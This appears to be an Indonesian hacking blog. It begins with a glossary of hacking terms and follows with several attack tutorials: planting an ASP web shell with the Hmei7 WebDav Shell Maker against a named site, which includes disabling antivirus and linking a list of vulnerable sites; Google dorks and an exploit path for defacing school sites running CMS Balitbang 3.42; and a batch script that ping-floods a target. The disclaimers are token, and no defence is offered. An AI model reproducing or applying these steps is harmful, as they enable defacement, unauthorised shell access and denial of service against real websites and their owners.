日本で働こう!収入を生み出す。
http://bit.ly/MagangJepang2019

15 Istilah Dalam Dunia Hacking yang Perlu Kamu Ketahui Bag. 2

Minggu, Desember 07, 2014
Istilah Dalam Dunia Hacking yang Perlu Kamu Ketahui Bag. 2 | Cirebon-Cyber4rt - Setelah sebelumnya saya pernah share Istilah Dunia Hacking Bag. 1 kali ini saya akan share Bagian keduanya. Yang tentunya saya ambil dari berbagai sumber.

Ok, sebelum kita simak bersama postingan ini, ada baiknya bagi yang belum tau Bagian 1 istilah-istilah hacking untuk membacanya.

Istilah Dalam Dunia Hacking yang Perlu Kamu Ketahui Bag. 2
Istilah Hacking

ISTILAH DALAM DUNIA HACKING YANG PERLU KAMU KETAHUI:

1). Bind
Membuka port pada komputer korban, biasanya untuk tujuan backdooring. Bind umumnya disertai service-service yang langsung mengakses shell.

2). Back Connect
Mendapatkan koneksi balik atau mengkonek-kan komputer korban ke komputer kita/attacker.

3). Port
Sederhananya adalah sebuah colokan, dimana colokan tersebut menyediakan layanan (service) tertentu. Pada hardware komputer terdapat USB Port, Serial Port, Printer Port, dll.

4). Flood
Membanjiri target untuk tujuan target down. Flood = DoS.

5). Port Scanning
Memindai/mencari port-port yang terbuka pada suatu server.

6). Exploit
Memanfaatkan bugs yang ditemukan untuk masuk kedalam sistem.

7). Shell Intepreter
Bbentuk antarmuka yang merupakan penghubung antara shell dengan brainware. Bentuk umumnya berupa console, cmd, webshell, dll.

8). Crack
Program kecil yang biasanya digunakan untuk mengakali perlindungan anti pembajakan dari sebuah piranti lunak berlisensi. Biasanya para pembajak menyertakan crack dalam paket piranti lunak yang mereka distribusikan.

9). Cookie
Sejumlah kecil data, yang sering kali berisi pengenal unik anonim yang dikirimkan kepada browser Anda dari komputer situs web dan disimpan pada harddrive komputer Anda.

10). Cookie Stealer
Tehnik yang digunakan untuk mengambil atau mencuri cookie.

11). DoS
Jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar.

Sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

12). TCP Flood
Membanjiri jalur tcp target sehingga target kehabisan bandwith pada port yg sedang d flood. Pada ddos web server, tcp flood d serangkan ke port 80 (http), sehingga menyebabkan jalur http penuh.

13). Hashing
Teknik mengindeks pada menajemen database dimana nilai kunci:key (yang mengindentifikasikan record)

14). Tsunami Flood
Membanjiri jalur tcp target sehingga target kehabisan bandwith pada port yg sedang d flood. Pada ddos web server, tcp flood d serangkan ke port 80 (http), sehingga menyebabkan jalur http penuh.

15). Javascript Injection
Suatu teknik yang dapat digunakan untuk mengganti isi suatu situs tanpa meninggalkan situs tersebut.

Teknik ini memerlukan pengguna komputer untuk memasukkan kode Javascript pada URL suatu suatu situs (jarang sekali suatu situs membiarkan kita untuk melakukan javascript injection pada comment box, informasi, dll kecuali guestbook).

16). Root
Pengguna dengan hak tertinggi didalam, dan tidak ada batasan wewenang, dalam komputer jaringan. Istilah ini diadaptasi dari sistem UNIX dimana seorang pengguna bisa memiliki hak pengendalian terbatas pada sebuah sistem.

Hacker menggunakan istilah ini untuk menggambarkan kemampuan mereka dalam melancarkan serangan dan menguasai sistem korbannya.

17). Port Fisik
Penghubung antara CPU dengan hardware external.

18). Post Service
penghubung antar service/layanan pada sistem.

19). Port Scanning
Memindai/mencari port-port yang terbuka pada suatu server.

20). Dork
Perintah tersembunyi dari google atau keyword yang digunakan hacker untuk mencari target.

Sebenarnya masih banyak lagi istilah hacking yang harus kita ketahui jika ingin mendalami bidang tersebut. Sekian postingan saya kali ini tentang Istilah Dalam Dunia Hacking yang Perlu Kamu Ketahui Bag. 2.Semoga bermanfaat.



135 Cara Deface Website Dengan Webdav Shell Maker | Hmei7

Rabu, Mei 15, 2013
Cara Deface Website Dengan Webdav Shell Maker | Cirebon-Cyber4rt - Malam sob, ngga terasa sudah lama ngga posting tentang hacking hehee. Ada beberapa hal yang membuat saya vacum dari dunia blog selama hampir 2 bulan ini. Selain jadwal jumpa fans yang padat, saya juga sedang fokus untuk masuk perguruan tinggi.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7
Webdav Shell Maker

Ok deh langsung saja ke inti postingan kali ini, o'ya! disini saya hanya memberikan tutorial untuk pembelajaran. Bukan sok2'an jadi heker, cracker, ceker atau apalah, saya hanya ingin berbagi karena Berbagi Itu Indah ( Mbah Qopet's Quote ) :p

Dengan menggunakan sebuah tools hacking buatan Hmei7 kita dapat dengan mudah menanam shell ke dalam sebuah website, dan dengan begitu kita dapat melakukan apa saja terhadap web yang kita tanami shell tersebut.

Sebelumnya soba harus mendowload tools Webdav Shell Maker'nya. Dibawah sudah saya siapkan link downloadnya.

Download Link :
  • Webdav Shell Maker: 4Shared | 70 KB
  • Shell | 10 KB
  • Password :   
Tutorial Deface Web dengan Webdav Shell Maker :
1). Download kemudian extract file ls-rootkit.Rar
2). Buka tools webdav yang sudah di download tadi, klik menu tab 'WebDav' lalu pilih 'Asp shell maker'.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

3). Buka menu Setting, pada menu setting Name of your shell bisa diubah dengan nama kamu, kemudian Load Shell from file, pilih shell Umer.asp;

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

4). Selanjutnya, pilih Add site, disini saya menggunakan target http://fpzbtc.com/ lalu klik OK.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

5). Klik Serang !!!, lalu tunggu hingga scanning web selesai, jika shell berhasil tertanam, tampilannya akan seperti ini, klik OK.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

6). Block http://fpzbtc.com/Cirebon.asp;.txt lalu Copy dan Pastekan pada Addressbar Browser kalian, kemudian tekan Enter.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

7). Jika sudah masuk website target, klik UPLOAD FILE TO Blablabla,

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

8). Pilih scipt .html deface'an kamu, kemudian klik Upload!

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

9). Tahap akhir, copy file .html yang sudah kamu upload tadi lalu pastekan dibelakang Url website target.

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

10). Enter dan lihat hasilnya!

Cara Deface Website Dengan Webdav Shell Maker | Hmei7

Jika ingin mendeface seluruh halaman, kamu tinggal RENAME file kamu dengan Index.html, atau istilahnya tukar-menukar file .html ( Cari file bernama Index.html atau sejenisnya, delete file tersebut lalu Rename file upload'an kamu menjadi Index.html ) Gimana, ngerti ngga? harus ngerti!

Kalo menurut saya jangan nyerang Index nya deh, kasian adminnya... mending nitip file .html aja, kalo emang kamu hati nurani :p

Tidak semua website rentan atau mempunyai celah/vuln, jadi kalo belum berhasil... cari website lain yang bisa ditanami shell dengan tools ini, jika ingin praktis berikut List Website Vuln Terhadap WebDav. Jika masih ada yang belum dipahami, kalian bisa hubungi via facebook atau mention twitter saya.

Catatan:
Matikan Anti-virus ketika mendownload dan pada saat menggunakan tools WebDav ini, Anti-virus mendeteksi tools ini sebagai virus.

Sekian postingan saya kali ini tentang Cara Deface Website Dengan Webdav Shell Maker | Hmei7 semoga dapat bermanfat bagi kalian, wassalam.




39 Tutorial Deface Website CMS Balitbang Kemendiknas

Senin, April 08, 2013
Cara Deface Website CMS Balitbang Kemendiknas | Cirebon-Cyber4rt - Malem sob, jumpa lagi dengan saya admin ganteng KW 1 wwkwkw =D pada hari ini saya akan menulis sebuah tutorial deface pada web berbasis CMS Balitbang.

Tutorial Deface Website CMS Balitbang Kemendiknas
CMS Balitbang Kemendiknas 3.42

Sedikit membahas tentang CMS Balitbang, CMS Balitbang adalah salah satu CMS ( Content Management System ) yang sudah siap pakai dan biasanya dipergunakan untuk web sekolah. CMS ini dikembangkan oleh Balitbang Kemendiknas Indonesia.

Namun CMS buatan Indonesia ini masih mempunyai kelemahan/bug. Nah, dalam hal ini saya akan memberi tahu cara menemukan bug itu yang saya kutip dari Inj3ct0r .Mari kita simak secara seksama. Cekibroott !

CMS Balitbang Kemendiknas 3.42
Dork :
inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"

Exploit :
http://public_html/dir/editor/filemanager/connectors/test.html

1). Masukan salah satu dork diatas untuk mencari bug pada CMS Balitbang
2). Kemudian pilih salah satu website dari hasil pencarian menggunakan dork tersebut
Tutorial Deface Website CMS Balitbang Versi 3.42

3). Tampilan awal web target.
Tutorial Cara Deface Website CMS Balitbang 3.42

4). Setelah itu kita masukan exploit untuk CMS Balitbang pada url target di addressbar lalu tekan Enter.
Tutorial Cara Deface Website CMS Balitbang 3.42

5). Maka nanti tampilannya akan seperti ini :
Tutorial Cara Deface Website CMS Balitbang 3.42

6). Ubah menu ASP menjadi PHP dan selanjutnya kita pilih file yang akan kita sisipkan kedalam web target.
Tutorial Cara Deface Website CMS Balitbang 3.42

Catatan :
File yang bisa disisipkan hanya file yang berekstensi .txt

7). Jika file sukses terupload, maka akan tampil seperti dibawah ini.
Tutorial Cara Deface Website CMS Balitbang 3.42

8). Setelah itu tinggal kita cari file yang disisipkan ke dalam web tersebut dan taraaa...
Tutorial Cara Deface Website CMS Balitbang 3.42

Catatan :
File akan berada disini, Contoh : http://target.com/userfiles/file/Nama_File.txt

Gimana, mudahkan caranya? Sekian dulu tutorial dari saya kali ini, kalau ada yang bisa edit supaya bisa upload shell.php kasih tau ane yak wkwk :p

Dan saya minta maaf kalau kebanyakan web yang dijadikan target adalah website Indonesia, karena umumnya website-website sekolah di Indonesia menggunakan CMS Balitbang ini :'(

Satu lagi, saya mohon maaf kalo hanya bisa deface tapi tidak bisa patching, soalnya ngga ada yang ngajarin bijimane cara protectnya :'(

Wassalam.



60 Cara Membuat Tool DDoS Sederhana dari Notepad

Minggu, Desember 23, 2012
Cara Membuat DDoS Sederhana dari Notepad | Cirebon-Cyber4rt - DDoS merupakan salah satu serangan terhadap sebuah komputer atau server didalam sebuah jaringan internet, dengan cara membanjiri lalu lintas host target sehingga sulit untuk diakses.

Cara Membuat Tool DDoS Sederhana dari Notepad
DDos Tools

Dan kali ini saya akan memberikan sebuah tutorial, yaitu cara membuat tools DDoS sederhana dari notepad. Jika kalian penasaran, mari kita simak berikut ini.

1. Buka Notepad
Cara Membuat Tool DDoS Sederhana dari Notepad

2. Masukan Kode Berikut Ini :

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3. Kemudian Save As...
Cara Membuat Tool DDoS Sederhana dari Notepad

4. Beri nama Tools DDoS.bat - Ubah Save As type: All Files - Save.
Cara Membuat Tool DDoS Sederhana dari Notepad

5. Buka file yang sudah dibuat tadi,

6. Jika berhasil tampilannya akan seperti ini :
Cara Membuat Tool DDoS Sederhana dari Notepad

7. Masukan web target pada kolom yang berkedip
8. Kemudian tekan Enter.

Dengan serangan sederhana ini dan dilakukan secara berulang-ulang, web target akan sedikit lambat jika kita akses. Tutorial ini hanya untuk pembelajaran, jadi jangan disalahgunakan ya :)

Sekian saja postingan saya siang ini tentang Cara Membuat Tool DDoS Sederhana dari Notepad, semoga dapat bemanfaat.

Credits: Binus Hacker



Contact

Nama

Email *

Pesan *